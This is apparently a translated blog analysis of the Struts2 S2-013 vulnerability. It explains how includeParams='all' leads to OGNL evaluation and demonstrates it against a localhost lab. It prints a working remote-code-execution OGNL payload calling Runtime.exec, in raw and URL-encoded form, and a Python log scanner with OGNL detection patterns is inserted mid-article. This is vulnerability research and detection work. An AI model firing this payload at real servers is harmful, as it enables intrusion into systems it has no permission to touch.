Preface

First, a few off-topic remarks; readers who are not interested can skip them.

The earlier S2-008, S2-009 and S2-012 vulnerabilities all arose from incomplete restrictions on certain parameters (both in terms of attack surface and attack depth).

But during the analysis I kept feeling that something was not quite right, as if a piece was missing. I am probably still too green; I will try to fill it in later.
For now I am not publishing those write-ups as filler; interested readers can take a look:
http://www.kingkk.com/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/
http://www.kingkk.com/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-012/

Now on to this article.

S2-014 is a vulnerability caused by the incomplete fix for S2-013; it will be mentioned in the fix section, so the main analysis in this article is still of S2-013.

Also, while analysing I found that the online references I consulted contain some errors in the vulnerability trigger logic, at least that is what I currently believe :) The specific reasons are explained in detail in the vulnerability analysis.

The vulnerable environment was adapted from vulhub; the environment source is at https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-013 and interested readers are welcome to analyse it together.

If there are any omissions, corrections are welcome.

Vulnerability information

https://cwiki.apache.org/confluence/display/WW/S2-013

Both the s:url and s:a tag provide an includeParams attribute.

The main scope of that attribute is to determine whether to include http request parameters or not.

The allowed values of includeParams are:

  1. none - include no parameters in the URL (default)
  2. get - include only GET parameters in the URL
  3. all - include both GET and POST parameters in the URL

A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as a request parameter of a URL or A tag, which will cause a further evaluation.

The second evaluation happens when the URL/A tag tries to resolve every parameter present in the original request.
This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have them evaluated as OGNL expressions to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.

In Struts2, the <s:a> and <s:url> tags both have an includeParams attribute, which can be set to the following values:

  1. none - include no parameters in the URL (default)
  2. get - include only the GET parameters in the URL
  3. all - include both GET and POST parameters in the URL

When includeParams=all, both the GET and POST parameters of the current request are placed into the URL's GET parameters.

At that point, when <s:a> / <s:url> tries to resolve the original request parameters, the OGNL expression they contain is evaluated.

Exploitation

Let's first look at how the tags are set up in index.jsp:

<p><s:a id="link1" action="link" includeParams="all">"s:a" tag</s:a></p>
<p><s:url id="link2" action="link" includeParams="all">"s:url" tag</s:url></p>

Then test with the simplest payload ${1+1} (remember to URL-encode it before submitting :)

http://localhost:8888/link.action?a=%24%7B1%2b1%7D

and you can see that the parameter in the returned URL has been evaluated to 2.

Then the command execution payload:
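As an added example that is not part of the original post, here is a small Python scanner for a defender's side of this: it percent-decodes every query parameter of a logged request (repeatedly, so double-encoded values are caught too) and flags the OGNL markers seen in the payloads on this page, namely the ${ / %{ delimiters, #_memberAccess, and @class@method static access. The access-log lines, the function names and the pattern list are constructed for this example and are not part of Struts or the original write-up.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# OGNL markers that have no business in an ordinary request parameter
# (constructed list for this example; extend it for your own environment).
OGNL_PATTERNS = [
    re.compile(r"[$%]\{"),          # ${...} / %{...} expression delimiters
    re.compile(r"#_memberAccess"),  # tampering with the OGNL security context
    re.compile(r"@[\w.]+@\w+"),     # static access, e.g. @java.lang.Runtime@getRuntime
]


def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded by `rounds`),
    so that a double-encoded parameter is inspected in its final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url: str) -> dict:
    """Return {param_name: decoded_value} for each query parameter of `url`
    whose decoded value matches one of the OGNL patterns."""
    query = urlsplit(url).query
    hits = {}
    # parse_qsl already performs one round of percent-decoding.
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = decode_param(value)
        if any(p.search(decoded) for p in OGNL_PATTERNS):
            hits[name] = decoded
    return hits


def scan_access_log(lines):
    """Yield (line_number, hits) for every log line whose request target
    carries a parameter that looks like an OGNL expression."""
    request_re = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
    for number, line in enumerate(lines, 1):
        match = request_re.search(line)
        if not match:
            continue
        # Prepend a dummy scheme/host so urlsplit sees the path as a path.
        hits = suspicious_params("http://placeholder" + match.group(1))
        if hits:
            yield number, hits


# Constructed sample lines in Apache combined-log format (not from a real server).
SAMPLE_LOG = [
    '10.0.0.1 - - [10/Oct/2018:12:00:00 +0000] "GET /link.action?a=hello HTTP/1.1" 200 512',
    '10.0.0.2 - - [10/Oct/2018:12:00:01 +0000] "GET /link.action?a=%24%7B1%2b1%7D HTTP/1.1" 200 512',
    '10.0.0.3 - - [10/Oct/2018:12:00:02 +0000] "GET /link.action?a=%2524%257B1%252b1%257D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Run stand-alone it reports lines 2 and 3 of the sample log, both decoding to the `${1+1}` probe from above, while the plain `a=hello` request is left alone. Matching on the decoded value rather than the raw query string is the point: the encoded form of the payload looks like noise, and a filter that only looks for a literal `${` in the URL misses it.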

${#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(+new java.lang.String(#d)),#out.close()}

Submitted after encoding:

http://localhost:8888/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27calc%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%2bnew%20java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D